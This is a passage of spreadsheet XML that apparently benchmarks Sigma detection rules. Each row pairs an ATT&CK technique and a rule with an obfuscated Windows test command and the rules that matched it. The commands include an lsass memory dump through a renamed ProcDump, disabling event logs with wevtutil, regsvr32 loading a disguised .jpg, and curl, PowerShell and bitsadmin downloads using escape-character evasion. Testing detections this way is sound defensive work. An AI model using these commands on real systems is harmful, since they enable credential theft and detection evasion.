      </c>
      <c r="H4162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4162" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location (9525dc73-0327-438c-8c04-13c0e037e9da); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J4162" s="44" t="n"/>
      <c r="K4162" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4163" ht="15.75" customHeight="1" s="42">
      <c r="A4163" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C4163" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D4163" s="44" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E4163" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s C:\Users\thaim\AppData\Local\Temp\shell32.jpg</t>
        </is>
      </c>
      <c r="F4163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4163" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension (089fc3d2-71e8-4763-a8a5-c97fbb0a403e); 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4163" s="44" t="n"/>
      <c r="K4163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4164" ht="15.75" customHeight="1" s="42">
      <c r="A4164" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C4164" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D4164" s="44" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E4164" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe C:\Users\thaim\AppData\Local\Temp\shell32.jpg /s</t>
        </is>
      </c>
      <c r="F4164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4164" s="44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4164" s="44" t="n"/>
      <c r="K4164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4165" ht="15.75" customHeight="1" s="42">
      <c r="A4165" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B4165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C4165" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D4165" s="44" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E4165" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s "C:\Users\thaim\AppData\Local\Temp\shell32.jpg"</t>
        </is>
      </c>
      <c r="F4165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4165" s="44" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location (9525dc73-0327-438c-8c04-13c0e037e9da); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22); Regsvr32 DLL Execution With Uncommon Extension (50919691-7302-437f-8e10-1fe088afa145)</t>
        </is>
      </c>
      <c r="J4165" s="44" t="n"/>
      <c r="K4165" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4166" ht="15.75" customHeight="1" s="42">
      <c r="A4166" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B4166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C4166" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D4166" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E4166" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.Net.WebClient]::new().DownloadData('http://example.com/test.txt') }"</t>
        </is>
      </c>
      <c r="F4166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4166" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4166" s="44" t="n"/>
      <c r="K4166" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4167" ht="15.75" customHeight="1" s="42">
      <c r="A4167" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B4167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C4167" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D4167" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E4167" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command i`w`r -Uri http://example.com/test.txt -OutFile C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F4167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4167" s="44" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation (deb9b646-a508-44ee-b7c9-d8965921c6b6); Powershell Token Obfuscation - Process Creation (deb9b646-a508-44ee-b7c9-d8965921c6b6)</t>
        </is>
      </c>
      <c r="J4167" s="44" t="n"/>
      <c r="K4167" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4168" ht="15.75" customHeight="1" s="42">
      <c r="A4168" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B4168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_autoit</t>
        </is>
      </c>
      <c r="C4168" s="44" t="inlineStr">
        <is>
          <t>Renamed AutoIt Execution</t>
        </is>
      </c>
      <c r="D4168" s="44" t="inlineStr">
        <is>
          <t>f4264e47-f522-4c38-a420-04525d5b880f</t>
        </is>
      </c>
      <c r="E4168" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Temp\legit_name_masquerade.exe /AutoIt3ExecuteScri^pt C:\data\script.au3</t>
        </is>
      </c>
      <c r="F4168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4168" s="44" t="n"/>
      <c r="J4168" s="44" t="n"/>
      <c r="K4168" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4169" ht="15.75" customHeight="1" s="42">
      <c r="A4169" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B4169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_autoit</t>
        </is>
      </c>
      <c r="C4169" s="44" t="inlineStr">
        <is>
          <t>Renamed AutoIt Execution</t>
        </is>
      </c>
      <c r="D4169" s="44" t="inlineStr">
        <is>
          <t>f4264e47-f522-4c38-a420-04525d5b880f</t>
        </is>
      </c>
      <c r="E4169" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Temp\renamed_binary.exe "/AutoIt3ExecuteScript" "C:\data\test.au3"</t>
        </is>
      </c>
      <c r="F4169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4169" s="44" t="n"/>
      <c r="J4169" s="44" t="n"/>
      <c r="K4169" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4170" ht="15.75" customHeight="1" s="42">
      <c r="A4170" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_sysinternals_procdump</t>
        </is>
      </c>
      <c r="C4170" s="44" t="inlineStr">
        <is>
          <t>Renamed ProcDump Execution</t>
        </is>
      </c>
      <c r="D4170" s="44" t="inlineStr">
        <is>
          <t>4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67</t>
        </is>
      </c>
      <c r="E4170" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Temp\not_procdump.exe "-ma" "/accepteula" lsass.exe C:\Windows\Temp\lsass.dmp</t>
        </is>
      </c>
      <c r="F4170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4170" s="44" t="n"/>
      <c r="J4170" s="44" t="n"/>
      <c r="K4170" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4171" ht="15.75" customHeight="1" s="42">
      <c r="A4171" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_sysinternals_procdump</t>
        </is>
      </c>
      <c r="C4171" s="44" t="inlineStr">
        <is>
          <t>Renamed ProcDump Execution</t>
        </is>
      </c>
      <c r="D4171" s="44" t="inlineStr">
        <is>
          <t>4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67</t>
        </is>
      </c>
      <c r="E4171" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\Temp\not_procdump.exe -m^a /accepte^ula lsass.exe C:\Windows\Temp\lsass.dmp</t>
        </is>
      </c>
      <c r="F4171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4171" s="44" t="n"/>
      <c r="J4171" s="44" t="n"/>
      <c r="K4171" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4172" ht="15.75" customHeight="1" s="42">
      <c r="A4172" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_sysinternals_procdump</t>
        </is>
      </c>
      <c r="C4172" s="44" t="inlineStr">
        <is>
          <t>Renamed ProcDump Execution</t>
        </is>
      </c>
      <c r="D4172" s="44" t="inlineStr">
        <is>
          <t>4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67</t>
        </is>
      </c>
      <c r="E4172" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\Temp\not_procdump.exe	-ma	/accepteula	lsass.exe	C:\Windows\Temp\lsass.dmp</t>
        </is>
      </c>
      <c r="F4172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4172" s="44" t="n"/>
      <c r="J4172" s="44" t="n"/>
      <c r="K4172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4173" ht="15.75" customHeight="1" s="42">
      <c r="A4173" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C4173" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D4173" s="44" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E4173" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "C:\Windows\System32\calc.exe" %temp%\T1036.007_masquerading.docx.exe /Y</t>
        </is>
      </c>
      <c r="F4173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4173" s="44" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory (f5d19838-41b5-476c-98d8-ba8af4929ee2); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J4173" s="44" t="n"/>
      <c r="K4173" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4174" ht="15.75" customHeight="1" s="42">
      <c r="A4174" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C4174" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D4174" s="44" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E4174" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "C:\Windows\System32""\calc.exe" %temp%\T1036.007_masquerading.docx.exe /Y</t>
        </is>
      </c>
      <c r="F4174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4174" s="44" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory (f5d19838-41b5-476c-98d8-ba8af4929ee2); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J4174" s="44" t="n"/>
      <c r="K4174" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4175" ht="15.75" customHeight="1" s="42">
      <c r="A4175" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C4175" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D4175" s="44" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E4175" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Copy-Item -Path "C:\Windows\System32`\calc.exe" -Destination "$env:TEMP\test.exe"}</t>
        </is>
      </c>
      <c r="F4175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4175" s="44" t="n"/>
      <c r="J4175" s="44" t="n"/>
      <c r="K4175" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4176" ht="15.75" customHeight="1" s="42">
      <c r="A4176" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B4176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C4176" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D4176" s="44" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E4176" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy "C:\Windows\SYSTEM~1\calc.exe" %temp%\test.exe /Y</t>
        </is>
      </c>
      <c r="F4176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4176" s="44" t="n"/>
      <c r="J4176" s="44" t="n"/>
      <c r="K4176" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4177" ht="15.75" customHeight="1" s="42">
      <c r="A4177" s="44" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B4177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_escape_char</t>
        </is>
      </c>
      <c r="C4177" s="44" t="inlineStr">
        <is>
          <t>Potential Commandline Obfuscation Using Escape Characters</t>
        </is>
      </c>
      <c r="D4177" s="44" t="inlineStr">
        <is>
          <t>f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd</t>
        </is>
      </c>
      <c r="E4177" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe ht^tp://example.com/test.txt</t>
        </is>
      </c>
      <c r="F4177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4177" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4177" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J4177" s="44" t="n"/>
      <c r="K4177" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4178" ht="15.75" customHeight="1" s="42">
      <c r="A4178" s="44" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B4178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_escape_char</t>
        </is>
      </c>
      <c r="C4178" s="44" t="inlineStr">
        <is>
          <t>Potential Commandline Obfuscation Using Escape Characters</t>
        </is>
      </c>
      <c r="D4178" s="44" t="inlineStr">
        <is>
          <t>f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd</t>
        </is>
      </c>
      <c r="E4178" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe h"tt"p://example.com/test.txt</t>
        </is>
      </c>
      <c r="F4178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4178" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J4178" s="44" t="n"/>
      <c r="K4178" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4179" ht="15.75" customHeight="1" s="42">
      <c r="A4179" s="44" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B4179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_escape_char</t>
        </is>
      </c>
      <c r="C4179" s="44" t="inlineStr">
        <is>
          <t>Potential Commandline Obfuscation Using Escape Characters</t>
        </is>
      </c>
      <c r="D4179" s="44" t="inlineStr">
        <is>
          <t>f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd</t>
        </is>
      </c>
      <c r="E4179" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c set PROTO=http&amp;&amp; call curl.exe %PROTO%://example.com/test.txt</t>
        </is>
      </c>
      <c r="F4179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4179" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J4179" s="44" t="n"/>
      <c r="K4179" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4180" ht="15.75" customHeight="1" s="42">
      <c r="A4180" s="44" t="inlineStr">
        <is>
          <t>t1140</t>
        </is>
      </c>
      <c r="B4180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_escape_char</t>
        </is>
      </c>
      <c r="C4180" s="44" t="inlineStr">
        <is>
          <t>Potential Commandline Obfuscation Using Escape Characters</t>
        </is>
      </c>
      <c r="D4180" s="44" t="inlineStr">
        <is>
          <t>f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd</t>
        </is>
      </c>
      <c r="E4180" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe h^t"t"p://example.com/test.txt</t>
        </is>
      </c>
      <c r="F4180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4180" s="44" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J4180" s="44" t="n"/>
      <c r="K4180" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4181" ht="15.75" customHeight="1" s="42">
      <c r="A4181" s="44" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B4181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_trace_evasion</t>
        </is>
      </c>
      <c r="C4181" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity</t>
        </is>
      </c>
      <c r="D4181" s="44" t="inlineStr">
        <is>
          <t>a238b5d0-ce2d-4414-a676-7a531b3d13d6</t>
        </is>
      </c>
      <c r="E4181" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe sl TEST-HOST -e:false</t>
        </is>
      </c>
      <c r="F4181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4181" s="44" t="inlineStr">
        <is>
          <t>Suspicious Eventlog Clearing or Configuration Change Activity (cc36992a-4671-4f21-a91d-6c2b72a2edf5)</t>
        </is>
      </c>
      <c r="J4181" s="44" t="n"/>
      <c r="K4181" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4182" ht="15.75" customHeight="1" s="42">
      <c r="A4182" s="44" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B4182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_trace_evasion</t>
        </is>
      </c>
      <c r="C4182" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity</t>
        </is>
      </c>
      <c r="D4182" s="44" t="inlineStr">
        <is>
          <t>a238b5d0-ce2d-4414-a676-7a531b3d13d6</t>
        </is>
      </c>
      <c r="E4182" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "wevtutil.exe s^e^t-l^o^g TEST-HOST /e:false"</t>
        </is>
      </c>
      <c r="F4182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4182" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity (a238b5d0-ce2d-4414-a676-7a531b3d13d6); Suspicious Eventlog Clearing or Configuration Change Activity (cc36992a-4671-4f21-a91d-6c2b72a2edf5)</t>
        </is>
      </c>
      <c r="J4182" s="44" t="n"/>
      <c r="K4182" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4183" ht="15.75" customHeight="1" s="42">
      <c r="A4183" s="44" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B4183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_trace_evasion</t>
        </is>
      </c>
      <c r="C4183" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity</t>
        </is>
      </c>
      <c r="D4183" s="44" t="inlineStr">
        <is>
          <t>a238b5d0-ce2d-4414-a676-7a531b3d13d6</t>
        </is>
      </c>
      <c r="E4183" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe set-log /e:false TEST-HOST</t>
        </is>
      </c>
      <c r="F4183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4183" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity (a238b5d0-ce2d-4414-a676-7a531b3d13d6); ETW Trace Evasion Activity (a238b5d0-ce2d-4414-a676-7a531b3d13d6); Suspicious Eventlog Clearing or Configuration Change Activity (cc36992a-4671-4f21-a91d-6c2b72a2edf5)</t>
        </is>
      </c>
      <c r="J4183" s="44" t="n"/>
      <c r="K4183" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4184" ht="15.75" customHeight="1" s="42">
      <c r="A4184" s="44" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B4184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C4184" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D4184" s="44" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E4184" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\bi^tsadmin.exe /transfer TestJob /download /priority foreground http://example.com/test.txt C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F4184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4184" s="44" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin (5b80a791-ad9b-4b75-bcc1-ad4e1e89c200); File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J4184" s="44" t="n"/>
      <c r="K4184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4185" ht="15.75" customHeight="1" s="42">
      <c r="A4185" s="44" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B4185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C4185" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D4185" s="44" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E4185" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\bitsadmin" /transfer TestJob /download /priority foreground http://example.com/test.txt C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F4185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4185" s="44" t="n"/>
      <c r="J4185" s="44" t="n"/>
      <c r="K4185" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4186" ht="15.75" customHeight="1" s="42">
      <c r="A4186" s="44" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B4186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C4186" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D4186" s="44" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E4186" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set BIN=bitsadmin&amp;&amp; call %BIN% /transfer TestJob /download /priority foreground http://example.com/test.txt C:\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F4186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4186" s="44" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin (5b80a791-ad9b-4b75-bcc1-ad4e1e89c200); File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J4186" s="44" t="n"/>
      <c r="K4186" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4187" ht="15.75" customHeight="1" s="42">
      <c r="A4187" s="44" t="inlineStr">
        <is>
          <t>t1036.002</t>
        </is>
      </c>
      <c r="B4187" s="44" t="inlineStr">
        <is>
